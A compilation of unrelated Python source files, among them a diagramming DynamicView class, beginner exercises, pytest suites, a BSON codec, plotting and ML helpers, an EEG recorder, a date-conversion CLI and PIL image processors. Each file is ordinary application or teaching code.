self.sequence_number = SequenceNumber()
def add(
self,
source: Element,
destination: Element,
description: Optional[str] = None,
*,
technology: Optional[str] = None,
) -> RelationshipView:
"""Add a relationship to this DynamicView.
This will search for a relationship in the model from the source to the
destination with matching technology (if specified). It will also look for
situations where this interaction is a "response" in that it goes in the
opposite direction to the relationship in the model. If a description is
provided then this will be used in the view in preference to the description
on the relationship.
Examples:
Example of a request/response, assuming a single relationship in the model:
dynamic_view.add(container1, container2, "Requests data from")
dynamic_view.add(container2, container1, "Sends response back to")
"""
self.check_element_can_be_added(source)
self.check_element_can_be_added(destination)
relationship, response = self._find_relationship(
source, description, destination, technology
)
if relationship is None:
if technology:
raise ValueError(
f"A relationship between {source.name} and "
f"{destination.name} with technology "
f"'{technology}' does not exist in the model."
)
else:
raise ValueError(
f"A relationship between {source.name} and "
f"{destination.name} does not exist in "
"the model."
)
self._add_element(source, False)
self._add_element(destination, False)
return self._add_relationship(
relationship,
description=description or relationship.description,
order=self.sequence_number.get_next(),
response=response,
)
@contextmanager
def subsequence(self):
"""
Start a context-managed subsequence.
Subsequences allow nested interaction sequences, showing "child" calls through
numbering 1.1, 1.2, etc. Subsequences can themselves be nested.
Examples:
As an example, assume four Components, A-D. A makes a service request to B,
which in turn calls both C then D to process the request before returning the
results back to A. This can be shown using:
dynamic_view.add(a, b, "Sends service request to")
with dynamic_view.subsequence():
dynamic_view.add(b, c, "Makes subcall to")
dynamic_view.add(b, d, "Makes second subcall to")
dynamic_view.add(b, a, "Sends results back to")
This would result in four interactions shown, with orders "1", "1.1", "1.2"
and "2" respectively.
"""
try:
self.sequence_number.start_subsequence()
yield self
finally:
self.sequence_number.end_subsequence()
@contextmanager
def parallel_sequence(self, *, continue_numbering: bool = False):
r"""
Start a context-managed parallel sequence.
Args:
continue_numbering: Whether to continue the main sequence number
from where the parallel sequence ended when its context is
ended (`True`) or to reset the main sequence to where it began
(`False`). The latter is usually done so that you can start a
new parallel sequence.
Examples:
Parallel sequences allow for multiple parallel flows to share the same
sequence numbers, for example,
/-> C -\
A -> B -{ }-> E -> F
\-> D -/
could happen concurrently but you want both B->C and B->D to get order
number 2, and C->E and D->E to get order number 3. To achieve this,
you would do:
dynamic_view.add(a, b) # Will be order "1"
with dynamic_view.parallel_sequence():
dynamic_view.add(b, c) # "2"
dynamic_view.add(c, e) # "3"
with dynamic_view.parallel_sequence(continue_numbering=True):
dynamic_view.add(b, d) # "2" again
dynamic_view.add(d, e) # "3"
dynamiic_view.add(e, f) # "4"
"""
try:
self.sequence_number.start_parallel_sequence()
yield self
finally:
self.sequence_number.end_parallel_sequence(continue_numbering)
@property
def relationship_views(self) -> Iterable[RelationshipView]:
"""Return the relationship views in order of their sequence number.
Sorting uses "version number" style ordering, so 1 < 1.1 < 2 < 10.
"""
return sorted(self._relationship_views, key=attrgetter("order"))
def check_element_can_be_added(self, element: Element) -> None:
"""Make sure that the element is valid to be added to this view."""
if not isinstance(element, StaticStructureElement):
raise ValueError(
"Only people, software systems, containers and components can be "
"added to dynamic views."
)
if isinstance(element, Person):
return
if isinstance(self.element, SoftwareSystem):
# System scope, so only systems and containers are allowed
if element is self.element:
raise ValueError(
f"{element.name} is already the scope of this view and cannot be "
"added to it."
)
if isinstance(element, Component):
raise ValueError(
"Components can't be added to a dynamic view when the scope is a "
"software system"
)
self.check_parent_and_children_not_in_view(element)
elif isinstance(self.element, Container):
# Container scope
if element is self.element or element is self.element.parent:
raise ValueError(
f"{element.name} is already the scope of this view and cannot be "
"added to it."
)
self.check_parent_and_children_not_in_view(element)
else:
# No scope - only systems can be added
assert self.element is None
if not isinstance(element, SoftwareSystem):
raise ValueError(
"Only people and software systems can be added to this dynamic "
"view."
)
def _find_relationship(
self,
source: Element,
description: str,
destination: Element,
technology: Optional[str],
) -> Tuple[Optional[Relationship], bool]:
"""Return the best matching relationship and whether it is a response."""
# First preference is exactly matching description
rel = next(
(
rel
for rel in source.get_efferent_relationships()
if rel.destination is destination
and (rel.description == description or not description)
and (rel.technology == technology or technology is None)
),
None,
)
if rel:
return rel, False
# Next preference is non-matching description
rel = next(
(
rel
for rel in source.get_efferent_relationships()
if rel.destination is destination
and (rel.technology == technology or technology is None)
),
None,
)
if rel:
return rel, False
# Finally look for "response" to relationship in the opposite direction but
# ignore descriptions
rel = next(
(
rel
for rel in source.get_afferent_relationships()
if rel.source is destination
and (rel.technology == technology or technology is None)
),
None,
)
return rel, True
@classmethod
def hydrate(
cls, io: DynamicViewIO, *, element: Optional[Union[SoftwareSystem, Container]]
) -> "DynamicView":
"""Hydrate a new DynamicView instance from its IO."""
return cls(
element=element,
**cls.hydrate_arguments(io),
)
|
from datetime import datetime
from .parser import Parser
from .simulation import Simulation
from ._helpers import properties
parser = Parser()
simulation = Simulation()
warnings = properties["warnings"]
messages = properties["messages"]
def parse(*args, **kwargs):
parser.parse(*args, **kwargs)
def run(*args, **kwargs):
if len(args) + len(kwargs) > 0:
parse(*args, **kwargs)
simulation.run(parser)
def getReports():
return simulation.reports
def createReport():
return f"""gpss.py Simulation Report - {parser.infile}
Generated on {datetime.now().strftime("%A, %B %d, %Y at %H:%M:%S %Z")
.strip()}
""" + "".join(getReports())
|
# Desafio 101 - FUNÇÕES
'''
Crie um programa que tenha uma função chamada voto() que vai Receber
o ano de nascimento de uma pessoa, retornando um valor literal
indicando se a pessoa tem voto Obrigatório, Facultativo ou não vota.
'''
def voto(ano):
from datetime import date
a = date.today().year
idade = a - ano
if idade < 16:
return 'Não vota!'
elif (idade >= 16 and idade < 18) or idade >= 65:
return 'Voto Facultativo!'
else:
return 'Voto Obrigatório!'
# Programa Principal
ano = int(input('Em que ano você nasceu? '))
print(voto(ano)) |
from json import dumps
import pytest
import os
def test_model_inference_success(test_client, input_line):
"""
API /predict' with the valid input results model inference success and return the status code 200
"""
response = test_client.post('/predict',
data=dumps(input_line),
content_type="application/json")
assert response.status_code == 200
def test_model_inference_fails(test_client, input_line):
"""
API /predict' with the invalid input results model inference fails and return the status code 400
"""
response = test_client.post('/predict',
data=dumps({"test": 123}),
content_type="application/json")
assert response.status_code == 400
@pytest.mark.run(order=-1)
def test_model_inference_no_model_fails(test_client, input_line):
"""
API /predict' with the invalid input but model doesn't exists in the model directory results response code 400
"""
CUR_DIR = os.path.dirname(os.path.realpath(__file__))
MODEL_FILE = os.path.join(CUR_DIR, "..", "models", "classifier.joblib")
os.remove(MODEL_FILE)
response = test_client.post('/predict',
data=dumps(input_line),
content_type="application/json")
assert response.status_code == 400
|
from django.contrib import admin
from electricity.models import electricity
# Register your models here.
admin.site.register(electricity) |
'''
Instructions
You have access to a database of student_scores in the format of a dictionary. The keys in student_scores are the names of the students and the values are their exam scores.
Write a program that converts their scores to grades. By the end of your program, you should have a new dictionary called student_grades that should contain student names for keys and their grades for values. The final version of the student_grades dictionary will be checked.
DO NOT modify lines 1-7 to change the existing student_scores dictionary.
DO NOT write any print statements.
This is the scoring criteria:
Scores 91 - 100: Grade = "Outstanding"
Scores 81 - 90: Grade = "Exceeds Expectations"
Scores 71 - 80: Grade = "Acceptable"
Scores 70 or lower: Grade = "Fail"
Expected Output
'{'Harry': 'Exceeds Expectations', 'Ron': 'Acceptable', 'Hermione': 'Outstanding', 'Draco': 'Acceptable', 'Neville': 'Fail'}'
Hint
Remember that looping through a Dictionary will only give you the keys and not the values.
If in doubt as to why your code is not doing what you expected, you can always print out the intermediate values.
At the end of your program, the print statement will show the final student_scores dictionary, do not change this.
'''
student_scores = {
"Harry": 81,
"Ron": 78,
"Hermione": 99,
"Draco": 74,
"Neville": 62,
}
# 🚨 Don't change the code above 👆
#TODO-1: Create an empty dictionary called student_grades.
student_grades = {}
#TODO-2: Write your code below to add the grades to student_grades.👇
for names in student_scores:
if student_scores[names] >= 91:
student_grades[names] = "Outstanding"
elif student_scores[names] >= 81:
student_grades[names] = "Exceeds Expectations"
elif student_scores[names] >= 71:
student_grades[names] = "Acceptable"
else:
student_grades[names] = "Fail"
# 🚨 Don't change the code below 👇
print(student_grades) |
"""
Tests for the ``aliquotmaf.filters.ExAC`` class.
"""
from collections import OrderedDict
import pytest
from maflib.column_types import NullableFloatColumn
from aliquotmaf.converters.builder import get_builder
from aliquotmaf.filters import ExAC
subpops = [
"nontcga_ExAC_AF_Adj",
"nontcga_ExAC_AF",
"nontcga_ExAC_AF_AFR",
"nontcga_ExAC_AF_AMR",
"nontcga_ExAC_AF_EAS",
"nontcga_ExAC_AF_FIN",
"nontcga_ExAC_AF_NFE",
"nontcga_ExAC_AF_OTH",
"nontcga_ExAC_AF_SAS",
]
@pytest.fixture
def setup_filter():
created = []
def _make_filter(cutoff):
curr = ExAC.setup(cutoff)
created.append(curr)
return curr
yield _make_filter
for record in created:
record.shutdown()
@pytest.fixture
def test_scheme(get_test_scheme):
vals = []
for p in subpops:
vals.append((p, NullableFloatColumn))
coldict = OrderedDict(vals)
return get_test_scheme(coldict)
def test_setup_exac(setup_filter):
cutoff = 0.0004
filterer = setup_filter(cutoff)
assert isinstance(filterer, ExAC)
def test_exac_filter_1(test_scheme, setup_filter, get_empty_maf_record):
"""
Test exac filter when all freqs are None
"""
cutoff = 0.0004
filterer = setup_filter(cutoff)
maf_record = get_empty_maf_record
for key in subpops:
maf_record[key] = get_builder(key, test_scheme, value=None)
result = filterer.filter(maf_record)
assert result is False
def test_exac_filter_2(test_scheme, setup_filter, get_empty_maf_record):
"""
Test exac filter when all freqs are below cutoff
"""
cutoff = 0.0004
filterer = setup_filter(cutoff)
maf_record = get_empty_maf_record
for key in subpops:
maf_record[key] = get_builder(key, test_scheme, value=0.0003)
result = filterer.filter(maf_record)
assert result is False
def test_exac_filter_3(test_scheme, setup_filter, get_empty_maf_record):
"""
Test exac filter when all freqs are exactly cutoff
"""
cutoff = 0.0004
filterer = setup_filter(cutoff)
maf_record = get_empty_maf_record
for key in subpops:
maf_record[key] = get_builder(key, test_scheme, value=0.0004)
result = filterer.filter(maf_record)
assert result is False
def test_exac_filter_4(test_scheme, setup_filter, get_empty_maf_record):
"""
Test exac filter when all but 1 freqs is above cutoff
"""
cutoff = 0.0004
filterer = setup_filter(cutoff)
maf_record = get_empty_maf_record
for key in subpops:
maf_record[key] = get_builder(key, test_scheme, value=0.0004)
maf_record["nontcga_ExAC_AF_Adj"] = get_builder(
"nontcga_ExAC_AF_Adj", test_scheme, value=0.00041
)
result = filterer.filter(maf_record)
assert result is True
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
import binascii
import collections
import copy
import ctypes
import datetime
import hashlib
import uuid
import six
from . import c
from .utils import CObjectWrapper, PrettyOrderedDict, coerce_char_p, coerce_str
HASH = type(hashlib.md5())
INT_MAX = 2 ** 31 - 1
LONG_MAX = 2 ** 63 - 1
ID_KEY_NAME = coerce_char_p(c.JDBIDKEYNAME)
class BSONEncodeError(Exception):
def __init__(self, obj):
msg = 'Could not encode object {obj}.'.format(obj=repr(obj))
super(BSONEncodeError, self).__init__(msg)
class BSONDecodeError(Exception):
def __init__(self, msg=None):
if msg is None:
msg = 'Could not decode BSON object.'
super(BSONDecodeError, self).__init__(msg)
class MD5(six.binary_type):
"""Custom subclass for content of an MD5 binary field.
"""
def copy(self):
return copy.copy(self)
def digest(self):
return self.copy()
def hexdigest(self):
return coerce_str(binascii.hexlify(self))
def _datetime_to_millis(value):
epoch = datetime.datetime.utcfromtimestamp(0)
delta = value - epoch
millis = int(delta.total_seconds() * 1000)
return millis
def _bson_encode_element(key, value, into):
key = coerce_char_p(key)
if value is None:
r = c.bson.append_null(into, key)
elif isinstance(value, six.text_type):
value = coerce_char_p(value)
if key == ID_KEY_NAME:
oid = c.BSONOID.from_string(value)
r = c.bson.append_oid(into, key, ctypes.byref(oid))
else:
r = c.bson.append_string_n(into, key, value, len(value))
elif isinstance(value, bool):
r = c.bson.append_bool(into, key, value)
elif isinstance(value, six.integer_types):
# Need to be after bool because bool is a subclass of int.
if value > LONG_MAX:
raise BSONEncodeError(value)
elif value > INT_MAX:
r = c.bson.append_long(into, key, value)
else:
r = c.bson.append_int(into, key, value)
elif isinstance(value, float):
r = c.bson.append_double(into, key, value)
elif isinstance(value, datetime.datetime):
millis = _datetime_to_millis(value)
r = c.bson.append_date(into, key, millis)
elif isinstance(value, datetime.date):
value = datetime.datetime.combine(value, datetime.datetime.min.time())
millis = _datetime_to_millis(value)
r = c.bson.append_date(into, key, millis)
elif isinstance(value, uuid.UUID):
data = value.bytes
r = c.bson.append_binary(into, key, c.BSON_BIN_UUID, data, len(data))
elif isinstance(value, (HASH, MD5,)):
data = value.digest()
r = c.bson.append_binary(into, key, c.BSON_BIN_MD5, data, len(data))
elif isinstance(value, six.binary_type):
# Need to be after MD5 because MD5 is a subclass of six.binary_type.
buf = ctypes.create_string_buffer(value, len(value))
r = c.bson.append_binary(into, key, c.BSON_BIN_BINARY, buf, len(value))
elif isinstance(value, collections.Mapping):
r = c.bson.append_start_object(into, key)
if r != c.BSON_OK: # pragma: no cover.
raise BSONEncodeError(value)
for k in value:
_bson_encode_element(k, value[k], into)
r = c.bson.append_finish_object(into)
if r != c.BSON_OK: # pragma: no cover.
raise BSONEncodeError(value)
elif isinstance(value, collections.Sequence):
r = c.bson.append_start_array(into, key)
if r != c.BSON_OK: # pragma: no cover.
raise BSONEncodeError(value)
for i, v in enumerate(value):
_bson_encode_element(str(i), v, into)
r = c.bson.append_finish_array(into)
if r != c.BSON_OK: # pragma: no cover.
raise BSONEncodeError(value)
else:
# TODO: Implement tolerence mode, insert undefined for objects not
# encodable. Or maybe use pickle to save the binary?
r = c.BSON_ERROR
if r != c.BSON_OK:
raise BSONEncodeError(value)
def _bson_decode_double(bsiter):
value = c.bson.iterator_double_raw(bsiter)
return value
def _bson_decode_int(bsiter):
value = c.bson.iterator_int_raw(bsiter)
return value
def _bson_decode_long(bsiter):
value = c.bson.iterator_long_raw(bsiter)
return value
def _bson_decode_bool(bsiter):
value = c.bson.iterator_bool_raw(bsiter)
return value
def _bson_decode_oid(bsiter):
oid_ref = c.bson.iterator_oid(bsiter)
oid_str = six.text_type(oid_ref.contents)
return oid_str
def _bson_decode_string(bsiter):
size = c.bson.iterator_string_len(bsiter)
data_p = c.bson.iterator_string(bsiter)
s = ctypes.string_at(data_p, size - 1) # Minus NULL character.
return coerce_str(s)
def _bson_decode_date(bsiter):
timestamp = c.bson.iterator_date(bsiter)
dt = datetime.datetime.utcfromtimestamp(timestamp / 1000)
return dt
def _bson_decode_array(bsiter):
subiter = c.bson.iterator_create()
c.bson.iterator_subiterator(bsiter, subiter)
arr = _bson_decode_array_contents(subiter)
c.bson.iterator_dispose(subiter)
return arr
def _bson_decode_object(bsiter):
subiter = c.bson.iterator_create()
c.bson.iterator_subiterator(bsiter, subiter)
obj = _bson_decode_object_contents(subiter)
c.bson.iterator_dispose(subiter)
return obj
def _bson_decode_binary(bsiter):
subtype = c.bson.iterator_bin_type(bsiter)
try:
subdecoder = _BIN_SUBTYPE_DECODERS[subtype]
except KeyError: # pragma: no cover
raise BSONDecodeError(
'Could not decode binary with key {key} of type {subtype}'.format(
key=coerce_str(c.bson.iterator_key(bsiter)),
subtype=_BIN_SUBTYPE_NAMES[subtype],
)
)
size = c.bson.iterator_bin_len(bsiter)
data_p = c.bson.iterator_bin_data(bsiter)
data = ctypes.string_at(data_p, size=size)
return subdecoder(data)
_TYPE_DECODERS = {
c.BSON_DOUBLE: _bson_decode_double,
c.BSON_STRING: _bson_decode_string,
c.BSON_OBJECT: _bson_decode_object,
c.BSON_ARRAY: _bson_decode_array,
c.BSON_BINDATA: _bson_decode_binary,
c.BSON_UNDEFINED: lambda i: None,
c.BSON_OID: _bson_decode_oid,
c.BSON_BOOL: _bson_decode_bool,
c.BSON_DATE: _bson_decode_date,
c.BSON_NULL: lambda i: None,
c.BSON_INT: _bson_decode_int,
c.BSON_LONG: _bson_decode_long,
}
_TYPE_NAMES = [
'BSON_EOO',
'BSON_DOUBLE',
'BSON_STRING',
'BSON_OBJECT',
'BSON_ARRAY',
'BSON_BINDATA',
'BSON_UNDEFINED',
'BSON_OID',
'BSON_BOOL',
'BSON_DATE',
'BSON_NULL',
'BSON_REGEX',
'BSON_DBREF',
'BSON_CODE',
'BSON_SYMBOL',
'BSON_CODEWSCOPE',
'BSON_INT',
'BSON_TIMESTAMP',
'BSON_LONG',
]
_BIN_SUBTYPE_DECODERS = {
c.BSON_BIN_BINARY: lambda data: data,
c.BSON_BIN_UUID: lambda data: uuid.UUID(bytes=data),
c.BSON_BIN_MD5: MD5,
}
_BIN_SUBTYPE_NAMES = [
'BSON_BIN_BINARY',
'BSON_BIN_FUNC',
'BSON_BIN_BINARY_OLD',
'BSON_BIN_UUID',
'BSON_BIN_MD5',
'BSON_BIN_USER',
]
def _bson_decode_array_contents(subiter):
subitems = []
while True:
value_type = c.bson.iterator_next(subiter)
if value_type == c.BSON_EOO:
break
key = coerce_str(c.bson.iterator_key(subiter))
try:
key = int(key)
assert key == len(subitems)
except (AssertionError, ValueError): # pragma: no cover
# Error if the keys are not integers representing array indexes.
# This shouldn't happen if the BSON object is valid.
# TODO: Better error message.
raise BSONDecodeError
try:
decoder = _TYPE_DECODERS[value_type]
except KeyError: # pragma: no cover
raise BSONDecodeError(
'Could not decode object with key {key} of type {type}'.format(
key=key, type=_TYPE_NAMES[value_type],
)
)
subitems.append(decoder(subiter))
return subitems
def _bson_decode_object_contents(subiter):
subitems = PrettyOrderedDict()
while True:
value_type = c.bson.iterator_next(subiter)
if value_type == c.BSON_EOO:
break
key = coerce_str(c.bson.iterator_key(subiter))
try:
decoder = _TYPE_DECODERS[value_type]
except KeyError: # pragma: no cover
raise BSONDecodeError(
'Could not decode object with key {key} of type {type}'.format(
key=key, type=_TYPE_NAMES[value_type],
)
)
subitems[key] = decoder(subiter)
return subitems
def _get_data(bs):
sz = ctypes.c_int()
data_p = c.bson.data2(bs._wrapped, ctypes.byref(sz))
data = ctypes.string_at(data_p, sz.value)
return data
class BSON(CObjectWrapper):
"""Wrapper for a BSON construct.
"""
def __init__(self, wrapped):
"""Initialize a wrapper for a *finished* BSON struct.
:param wrapped: BSON struct to be wrapped.
:param managed: Whether the wrapped BSON struct should be deleted on
object deletion. Defaults to `True`.
"""
super(BSON, self).__init__(wrapped=wrapped, finalizer=c.bson.del_)
@classmethod
def encode(cls, obj, as_query=False):
"""Encode a Python object into BSON.
"""
if not isinstance(obj, collections.Mapping):
raise BSONEncodeError(obj)
wrapped = c.bson.create()
if as_query:
c.bson.init_as_query(wrapped)
else:
c.bson.init(wrapped)
for key in obj:
_bson_encode_element(key=key, value=obj[key], into=wrapped)
c.bson.finish(wrapped)
return cls(wrapped)
def decode(self):
bsiter = c.bson.iterator_create()
c.bson.iterator_init(bsiter, self._wrapped)
obj = _bson_decode_object_contents(bsiter)
c.bson.iterator_dispose(bsiter)
return obj
def __repr__(self): # pragma: no cover
return '<BSON {data}>'.format(data=repr(_get_data(self)))
def __eq__(self, other):
if self is other:
return True
if isinstance(other, BSON):
other = _get_data(other)
return _get_data(self) == other
def __ne__(self, other): # pragma: no cover
return not (self == other)
def encode(obj, as_query=False):
return BSON.encode(obj, as_query)
def decode(bs):
return bs.decode()
|
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import numpy as np
import pathlib
def plot_comparison(control, control_sim, modulated, modulated_sim, num_models, ylabel=None, title=None,
x_ticks=tuple(),width=None,height=None,dir_path=None, save=False, filename=None):
fig, ax = plt.subplots(1, figsize=(6, 8))
fig.set_size_inches(width,height)
for i in range(num_models):
x = i * np.ones(len(modulated_sim[i]))
modulated_sim[i] = np.sort(modulated_sim[i])
z = np.zeros(len(modulated_sim[i]))
j = 0
while j <= (len(modulated_sim[i]) - 2):
k = 0
while j + k + 1 <= (len(modulated_sim[i]) - 1) and modulated_sim[i][j + k] == modulated_sim[i][j + k + 1]:
k = k + 1
z[j] = k + 1
j = j + k + 1
sumnj = 0
dx = 0.1
for j in range(len(z)):
nj = int(z[j])
ev = 0
if np.mod(nj, 2) == 0:
ev = dx * 0.5
for k in range(nj):
pos = np.ceil(k / 2) * (-1) ** (np.mod(k, 2))
x[sumnj + k] = i + dx * pos + ev
sumnj = sumnj + nj
ax.plot(x, modulated_sim[i], 'ok', markersize=3,c='black')
ax.plot(i, control_sim[i], 'og', markersize=3,c='g')
ax.errorbar(i, modulated['mean'],
xerr=0, yerr=modulated['std'],
fmt='rs', capsize=5, markersize=8, elinewidth=4)
ax.errorbar(i, control['mean'],
xerr=0, yerr=control['std'],
fmt='bs', capsize=2, markersize=4, elinewidth=2)
ind = np.arange(num_models)
plt.xticks(ind, x_ticks, rotation=60,fontsize=14)
plt.yticks(fontsize=12)
plt.ylabel(ylabel,fontsize=14)
plt.title(title)
plt.tight_layout()
# legend
'''
legend_elements = [Line2D([0], [0], marker='o', color='w', label='Optimised models',
markerfacecolor='g', markersize=1),
Line2D([0], [0], marker='o', color='w', label='Optimised Modulated models',
markerfacecolor='k', markersize=1),
Line2D([0], [0], marker='s', color='w', label='Modulated Data',
markerfacecolor='r', markersize=1),
Line2D([0], [0], marker='s', color='w', label='Control Data',
markerfacecolor='b', markersize=1)]
ax.legend(handles=legend_elements, loc='upper right')
'''
if save:
plt.savefig(pathlib.Path(dir_path) / filename,
dpi=600,facecolor='w', edgecolor='w',
orientation='portrait', papertype=None, format=None,
transparent=False, bbox_inches=None, pad_inches=0.1,
frameon=None, metadata=None)
else:
plt.show()
|
import numpy as np
import torch
from torchvision.utils import make_grid
from .base import ModelAdapter
__all__ = ['Segmentation3dModelAdapter']
class Segmentation3dModelAdapter(ModelAdapter):
def __init__(self, config, log_path):
super(Segmentation3dModelAdapter, self).__init__(config, log_path)
self.num_classes = config['model']['classes']
self.class_colors = np.random.randint(0, 255, (self.num_classes, 3), dtype=np.uint8)
self.class_colors[0] = (0, 0, 0)
def make_tensorboard_grid(self, batch_sample):
data, y_pred = batch_sample['data'], batch_sample['y_pred']
y = data[1]
# select 2d slices with highest number of non-background pixels
images_number = 16
y_pred_2d, y_2d = y_pred.permute(0, 4, 1, 2, 3), y.permute(0, 3, 1, 2)
y_pred_2d, y_2d = y_pred_2d.reshape(-1, *y_pred_2d.shape[2:]), y_2d.reshape(-1, *y_2d.shape[2:])
scores = y_2d.sum(dim=(1, 2))
_, indexes = scores.topk(images_number)
y, y_pred = y_2d[indexes], y_pred_2d[indexes]
_, y_pred = y_pred.max(1)
return make_grid(torch.cat([
self.decode_segmap(y, self.num_classes),
self.decode_segmap(y_pred.to(y.device), self.num_classes)
]), nrow=y.shape[0])
def decode_segmap(self, image, nc=201):
out = torch.empty(image.shape[0], 3, *image.shape[1:], dtype=torch.float32, device=image.device)
for l in range(0, nc):
idx = image == l
out[:, 0].masked_fill_(idx, self.class_colors[l][0])
out[:, 1].masked_fill_(idx, self.class_colors[l][1])
out[:, 2].masked_fill_(idx, self.class_colors[l][2])
return out / 255.0
|
""" https://docs.python.org/3/library/enum.html
"""
from enum import Enum
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
if __name__ == "__main__":
color_names = [c.name for c in Color]
color_values = [c.value for c in Color]
print(color_names)
print(color_values)
print(Color["RED"])
print(Color.RED)
|
#!/usr/bin/env python
import time, struct,sys
import bluetooth
from mindwavemobile.MindwaveDataPoints import AttentionDataPoint, EEGPowersDataPoint
from mindwavemobile.MindwaveDataPointReader import MindwaveDataPointReader
import numpy as np
import pylab as pl
def main():
mdpr = MindwaveDataPointReader()
mdpr.start()
eeg_datapoints = []
attention_datapoints = []
index = 0
try:
while(True):
data = mdpr.readNextDataPoint()
if (data.__class__ is AttentionDataPoint):
attention_datapoints.append((time.time(),data))
if (data.__class__ is EEGPowersDataPoint):
eeg_datapoints.append((time.time(),data))
index+=1
print index
except KeyboardInterrupt:
pass
fmt = 'ddddddddd'
dataFormat = []
file_ = open(sys.argv[1], 'wb')
file_.write(fmt.ljust(25,' '))
for i in xrange(len(eeg_datapoints)):
timestamp = attention_datapoints[i][0]
attention = attention_datapoints[i][1]
delta = eeg_datapoints[i][1].delta
theta = eeg_datapoints[i][1].theta
lowalpha = eeg_datapoints[i][1].lowAlpha
highalpha = eeg_datapoints[i][1].highAlpha
lowbeta = eeg_datapoints[i][1].lowBeta
highbeta = eeg_datapoints[i][1].highBeta
lowgamma = eeg_datapoints[i][1].lowGamma
midgamma = eeg_datapoints[i][1].midGamma
s = struct.pack(fmt,timestamp, delta, theta, lowalpha, highalpha, lowbeta, highbeta, lowgamma, midgamma)
file_.write(s)
file_.close()
if __name__ == '__main__':
main() |
"""Entrypoint for `ee`.
Functions not decorated with @app are actions to affect state"""
import readline # noqa: F401
from typing import List
import pyperclip
import typer
from click import clear
from ee_cli import __doc__, __version__
from ee_cli.constants import CONFIGURATION_INFO, HOTWORDS_HELP, MAYBE_TZ_HEADS_UP
from ee_cli.repl_content_state import content_state
from ee_cli.settings import Settings
from ee_cli.ui import EchoList
app = typer.Typer(name="ee", help="A salve for timesmiths 🧴🕰️")
settings = Settings()
def _repl():
"""Run the interface for interactively transforming dates."""
colored_prompt = typer.style(
# concatenate strings to maintain coloring. f-strings break colors.
f"\n\n{MAYBE_TZ_HEADS_UP}"
+ typer.style(" > ", fg=typer.colors.BRIGHT_RED)
)
clear() # create a full-screen view
dispatch_alter_visible_content, visible_content = content_state()
while True:
input_ = typer.prompt(
"",
prompt_suffix=colored_prompt, # suffix lookin like a prefix
default=visible_content(),
show_default=True,
)
dispatch_alter_visible_content(input_)
clear()
def _version_callback(value: bool, ctx: typer.Context):
"""For --version."""
if value:
if len(ctx.args) or any(v for v in ctx.params.values()):
raise typer.Abort("--version must be called alone.")
typer.echo(__version__)
raise typer.Exit()
return value
def _exclusivity_check(ctx: typer.Context):
"""Make sure arguments don't get called in combination that don't make sense.
It's not `app.callback` decorated b/c that's only for apps w multiple commands"""
if ctx.params["repl"] is True:
ctx.params.pop("repl")
# everything gotta be falsey
if any(v for v in ctx.params.values()) or len(ctx.args):
raise typer.Abort("--repl must be called alone.")
return ctx
@app.command(help=__doc__, no_args_is_help=True)
def main(
ctx: typer.Context,
dates: List[str] = typer.Argument(
None,
help="Dates/datetimes separated by spaces.\n"
"Can be in the style of an epoch timestamp (milliseconds will be ignored) or\n"
"Any of YYYY-MM-DD, MM-DD-YY, MMM DD YYYY, MMM D YYYY, MMM D YY, MMM DD YY or\n"
"in any of the formats specified in EXTRA_DATETIME_INPUT_FORMATS, which can be "
"any of the formats supported by Pendulum: "
"https://pendulum.eustace.io/docs/#tokens",
),
copy: bool = typer.Option(
False,
"--copy",
"-c",
is_flag=True,
show_default=False,
help="Send output to the clipboard.",
),
plain: bool = typer.Option(
False,
"--plain",
"-p",
is_flag=True,
show_default=False,
help="Don't show pretty output, just transformations.",
),
repl: bool = typer.Option(
False,
"--repl",
"-r",
is_flag=True,
show_default=False,
help="In an infinite prompt, give an epoch, get a datetime, and vice versa.\n"
"Can be controlled with various redundant hotwords:\n"
f"{HOTWORDS_HELP}",
),
config: bool = typer.Option(
False,
"--show-config",
is_flag=True,
show_default=False,
help="Show current values for `ee-cli` environment variables (including unset)",
),
version: bool = typer.Option(
None,
"--version",
"-v",
callback=_version_callback,
help="Print the version and exit",
),
):
"""Acts as the entrypoint for `ee`."""
_exclusivity_check(ctx)
if repl:
_repl()
return
if config:
typer.echo(CONFIGURATION_INFO)
return
output = EchoList(*dates)
if copy:
pyperclip.copy(output.plain_str())
typer.echo(
f"Converted date{'s' if len(dates) > 1 else ''} copied to clipboard."
)
return
typer.echo(output.plain_str() if plain else output)
# if it's not plain, we add a 3-space indent to match the styled EchoList.__str__
# if it *is* plain, we add the newline because EchoList.plain_str doesn't have one
maybe_indent = " " if not plain else "\n"
typer.echo(f"{maybe_indent}{MAYBE_TZ_HEADS_UP}")
|
from __future__ import division, unicode_literals
from PIL import Image, ImageOps
PROCESSORS = {}
def build_handler(processors, handler=None):
handler = handler or (lambda image, context: image)
for part in reversed(processors):
if isinstance(part, (list, tuple)):
handler = PROCESSORS[part[0]](handler, *part[1:])
else:
handler = PROCESSORS[part](handler)
return handler
def register(fn):
PROCESSORS[fn.__name__] = fn
return fn
@register
def default(get_image):
return build_handler(
[
"preserve_icc_profile",
"process_gif",
"process_png",
"process_jpeg",
"autorotate",
],
get_image,
)
@register
def autorotate(get_image):
def processor(image, context):
return get_image(ImageOps.exif_transpose(image), context)
return processor
@register
def process_jpeg(get_image):
def processor(image, context):
if context.save_kwargs["format"] == "JPEG":
context.save_kwargs["quality"] = 90
context.save_kwargs["progressive"] = True
if image.mode != "RGB":
image = image.convert("RGB")
return get_image(image, context)
return processor
@register
def process_png(get_image):
def processor(image, context):
if context.save_kwargs["format"] == "PNG" and image.mode == "P":
image = image.convert("RGBA")
return get_image(image, context)
return processor
@register
def process_gif(get_image):
def processor(image, context):
if context.save_kwargs["format"] != "GIF":
return get_image(image, context)
if "transparency" in image.info:
context.save_kwargs["transparency"] = image.info["transparency"]
palette = image.getpalette()
image = get_image(image, context)
image.putpalette(palette)
return image
return processor
@register
def preserve_icc_profile(get_image):
def processor(image, context):
icc_profile = image.info.get("icc_profile")
if icc_profile:
context.save_kwargs["icc_profile"] = icc_profile
return get_image(image, context)
return processor
@register
def thumbnail(get_image, size):
def processor(image, context):
image = get_image(image, context)
f = min(1.0, size[0] / image.size[0], size[1] / image.size[1])
return image.resize([int(f * coord) for coord in image.size], Image.LANCZOS)
return processor
@register
def crop(get_image, size):
width, height = size
def processor(image, context):
image = get_image(image, context)
ppoi_x_axis = int(image.size[0] * context.ppoi[0])
ppoi_y_axis = int(image.size[1] * context.ppoi[1])
center_pixel_coord = (ppoi_x_axis, ppoi_y_axis)
